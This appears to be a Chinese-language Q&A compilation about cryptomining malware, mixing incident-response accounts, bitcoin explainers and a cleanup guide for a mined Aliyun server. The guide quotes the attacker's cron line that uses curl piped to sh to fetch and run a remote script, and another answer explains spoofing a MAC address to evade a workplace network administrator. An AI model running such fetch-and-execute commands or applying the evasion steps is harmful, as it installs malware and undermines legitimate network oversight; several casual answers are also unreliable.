網站會被挖礦嗎

① 求助伺服器被挖礦程序入侵，如何排查

新客戶於最近向我們SINE安全公司咨詢，說他的伺服器經常卡的網站無法打開，遠程連接

伺服器的慢的要命，有時候PING值都達到300-500之間，還經常掉包，聽客戶這么一說，一般

會判斷為受到了CC+DDOS混合流量攻擊，再具體一問，說是機房那面沒有受到流量攻擊，這

就有點奇怪了，不是流量攻擊，還導致伺服器卡，網站無法打開，這是什麼攻擊？為了解決客

戶伺服器卡的問題，我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後，會自動啟動繼續挖礦，達到不間斷的挖礦，

仔細檢查發現是通過設置了每個小時執行任務計劃，遠程下載shell挖礦木馬，然後執行，檢查

當前進程是否存在，不存在就啟動挖礦木馬，進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據，以及感染蠕蟲的病

毒，如果數據被加密那損失大了，客戶是做平台的，裡面的客戶數據很重要，找出挖礦木馬後，

客戶需要知道伺服器到底是如何被攻擊的？ 被上傳挖礦木馬的？ 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析，發現該伺服器使用的是apache tomcat環境，平台的開

發架構是JSP+oracle資料庫，apache tomcat使用的是2016年的版本，導致該apache存在嚴重

的遠程執行命令漏洞，入侵者可以通過該漏洞直接入侵伺服器，拿到伺服器的管理員許可權，

SINE安全工程師立即對apache 漏洞進行修復，並清除木馬，至此問題得以解決，客戶伺服器

一切穩定運行，網站打開正常。

② 網路上的自動挖礦賺錢有是做什麼的有什麼壞處

估計你所看到的是指比特幣。
這是一種虛擬貨幣，漲跌不定。
有些人業余開著電腦運行所謂的挖礦程序來「挖」比特幣，挖到了就去賣錢。有些是公司化運作，投入大量人力物力挖礦。盈虧不好說。
現在比特幣沒以前容易得到了。

③ 網上挖礦是什麼

挖礦是將一段時間內比特幣系統中發生的交易進行確認，並記錄在區塊鏈上形成新區塊的過程，挖礦的人叫做礦工，簡單說來，挖礦就是記賬的過程，礦工是記賬員，區塊鏈就是賬本，怎樣激勵礦工來挖礦呢？比特幣系統的記賬權力是去中心化的，即每個礦工都有記賬的權利，成功搶到記賬權的礦工會獲得系統新生的比特幣獎勵因此挖礦就是生產比特幣的過程。中本聰最初設計比特幣時規定每產生210000個區塊，比特幣獎勵減半一次，直至比特幣不能再被細分，因為比特幣和黃金一樣總量有限，所以比特幣被稱為數字黃金，比特幣生產也俗稱挖礦。
.比特幣系統靠調節難度系數保證比特幣不被太快挖完，每10分鍾全網曠工共同計算一道難題競爭記賬權及比特幣獎勵，如果全網算力不斷增長比特幣將很快被挖完，為了保證比特幣穩定在大約10分鍾挖出一個區塊，中本聰設計礦工挖礦獲得比特幣的難度，每過2016個區塊(約2周時間)動態調整一次，令調整後的難度使得每生成一個區塊的預期時間為10分鍾現在的難度系數約為480PH/S(注:2017年9月)大約是創世區塊的680億倍，也就是說，以現在的算力，全網礦工需要經過約3000萬億億哈希運算才能找到一個符合條件的答案，生成新的區塊。
.相對於點對點交易，挖礦等在交易平台購買是目前獲得區塊鏈資產最主流的方式，即場內交易，區塊鏈資產的場內交易和股票類似，由平台幫你撮合，也不需要知道跟你成交的對手是誰，你的成交對手，有可能是一個人，也有可能是很多人，無論是買入還是賣出，交易平台會記錄所有人的掛單價格，買賣雙方通過實時買賣盤，可以獲取最新成交價格，同時交易平台會將歷史成交價格及成交量匯總成K線圖，方便投資者用於分析行情走勢，比如烏托市場就是全球比較主流的交易平台。

④ 免費的加速器會偷偷的挖礦嗎

不用天真了，世界上根本就不存在免費的東西。加速器收費有他的商業邏輯，收費靠的是收取用戶的費用來支撐高昂的伺服器帶寬成本。免費也有他的商業邏輯，在不影響體驗的情況下，適當的加一些第三方廣告維持成本順帶小賺一筆，還能進行推廣。。很高興能為你提供幫助

⑤ 挖礦會被電信公司發現

不確定，中國電信江蘇分公司校園門戶網站(pre.f-young.cn)提供下載的「天翼校園客戶端」被植入後門病毒，該病毒可接受黑客遠程指令，利用中毒電腦刷廣告流量，同時也會釋放「門羅幣」挖礦者病毒進行挖礦。用戶在安裝「天翼校園客戶端」之後，就會在安裝目錄中自動釋放speedtest.dll文件，也就是病毒的本體，所有執行下載、釋放其他病毒模塊等操作都由這個文件進行。廣告刷量模塊被執行後，它會創建一個隱藏的IE窗口，然後開始讀取雲端指令，在後台模擬用戶操作滑鼠、鍵盤點擊刷廣告。為了讓用戶不察覺這一情況，還屏蔽了音效卡播放廣告頁面中的聲音。
另外的病毒挖礦模塊，在分析之後發現所挖的是「門羅幣」，這是一種類似於「比特幣」的數字虛擬貨幣，每杖價格約500元。當病毒模塊開始「挖礦」時，計算機CPU資源佔用量明顯飆升，導致電腦性能變差，發熱量上升，同時電腦風扇也會高速運行，電腦噪音也會隨之增加。最後還發現，一款簽名為「中國電信股份有限公司」農歷日歷(Chinese Calendar)同樣存在該後門病毒。一般來說，像電信這樣大型企業公司的簽名應該不會存在什麼問題，這次被植入病毒確實讓人覺得有些奇怪，但究竟是怎麼被植入的，目前還沒有結果。
比特幣介紹：
一、比特幣的發行和交易的完成是通過挖礦來實現的，它以一個確定的但不斷減慢的速率被鑄造出來。每一個新區塊都伴隨著一定數量從無到有的全新比特幣。境外很多人以挖礦為生，但是在境內是不允許的，目前有關部門對此內容採取嚴打態勢。在家裡利用電腦挖礦，如果沒有大量用電的情況下，一般不會被供電局調查；如果耗電比較嚴重，又或者是有偷電行為，就有可能被供電局調查。到時候就不僅僅是被罰款那麼簡單了，還有可能承擔刑事責任。
二、工業互聯網平台和智能設備成為網路威脅的重要目標。據國家工業信息安全發展研究中心監測，第二季度我國境內共有22個工業互聯網平台提供服務，針對這些工業互聯網平台的、來源於境外的網路攻擊事件共有656起，涉及北京、重慶、湖南、內蒙古等地區；新增工業控制系統漏洞115個，涉及羅克韋爾、西門子、施耐德電氣等品牌的71款產品；我國境內感染工業互聯網智能設備惡意程序的受控IP地址共有52.7萬余個，受控IP地址數量在1萬個以上的僵屍網路共有13個。

⑥ 在單位這樣偷偷上網會被發現嗎

這樣的方法還是會讓網管發現的，因為你買的這塊網卡也是有個固定的mac地址的，網管那裡只是覺得這個mac是新出現的並非檢測不到。
你可以嘗試以下的方法修改軟mac地址：
1、右擊網上鄰居屬性---打開網卡所使用網卡的鏈接屬性----點擊配置----然後再點高級選項卡---然後在下面選擇網路地址----在右邊選擇值，然後在方框里輸入16進制的字元輸滿為止---一路確定退出。

這樣就修改了mac地址，但重新啟動的時候就會消失，必須得再次修改才行。

不過網管一旦發現你們總是用這樣的方法的話，人家會把mac地址和ip地址進行綁定的，那時候你們就一點辦法都沒有了。

你不聽的修改mac地址肯定是沒問題，這也是黑客比用的方法，難道你還找個僵屍機器上網不行，僵屍攻擊的方法是黑客們沒有辦法了才去操作和利用那些菜鳥的機器。

但修改mac地址的方法用多了讓網管發現了會將能上網的mac地址和ip進行綁定的，如果是綁定了的話你就沒有任何辦法了。

意思就是，這種修改軟mac的方法，只要電腦一重啟，你修改的mac地址就又變回了網卡的物理mac地址。就是說，只要電腦重啟一次就要改一次。

⑦ 免費的加速器會偷偷的挖礦嗎,,

免費的加速器會偷偷的挖礦。

除了燒顯卡的機器，一些ASIC（應用專用集成電路）專業挖礦機也在投入戰場，ASIC是專門為哈希運算設計的，計算能力也相當強勁，而且由於它們的功耗遠比顯卡低，因此更容易形成規模，電費開銷也更低，單張獨顯很難與這些挖礦機競爭，但與此同時，這種機器的花費也更大。

挖礦過程：

礦工們在挖礦過程中會得到兩種類型的獎勵：創建新區塊的新幣獎勵，以及區塊中所含交易的交易費。為了得到這些獎勵，礦工們爭相完成一種基於加密哈希演算法的數學難題。

⑧ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

⑨ 最近聽說進入不良網站，黑客會拿我們的手機挖礦啥的，自動彈出的不良網站我點進去一秒就退了，被挖礦嗎

沒有想的那麼神奇。。現在的不良網站一般都是教人如何賭博。。如何打架什麼的。通常會有賭博網站的連接在裡面。。誘惑你去賭博的。。沒有什麼挖礦什麼的。。退出去以後。重啟下手機。。基本就正常了。。

⑩ 退出不良網站手機還在挖礦嗎

噢，還有可能在後台運行中進行（最好先關了後台運行，再退出）